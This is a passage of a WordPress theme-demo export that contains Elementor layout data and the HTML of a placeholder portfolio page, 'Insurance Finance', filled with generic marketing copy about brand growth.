:"177fdce1","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e8ca3c2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7f78bab3","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"409d65b1","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"30db82d2","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"40a8f280","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4dfc12a3","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6ec964ab","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"14da4924","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"effadd0","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"1c1ad65","elType":"section","settings":[],"elements":[{"id":"e9a1e69","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7fc1151","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2d1ba77","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53806e0","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"482eda6","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9a61110","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"76b59f4","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7673113","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"49f1389","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c80313e","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2a8c375","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4e8b175","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e33b290","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6972998","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f2d582f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"30b7c55","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"da0d9c3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"37d935b","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3e05c1a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"408fb09","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"15a0bed","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7e5d765","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9e36e9e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4d1b5f5","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Insurance Finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/insurance-finance/</link>
		<pubDate>Fri, 11 Sep 2020 04:48:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=818</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 09, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>818</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:48:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:48:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[insurance-finance]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[819]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"927f8df","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"6791ad66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"445a200a","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"5789d963","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"788454d6","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"42dad2ce","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1e8fb8bb","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bd5ee3e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"25002852","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c55a945","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2736d520","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3616c54e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"21d1388b","elType":"widget","settings":{"editor":"<p>November 09, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"55401017","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16c4f4c6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"307fcf31","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"3b72cfa8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"434e61f3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a88fbc8","elType":"section","settings":[],"elements":[{"id":"1ea9ba8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3765db0","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f90b8da","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e28a545","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your 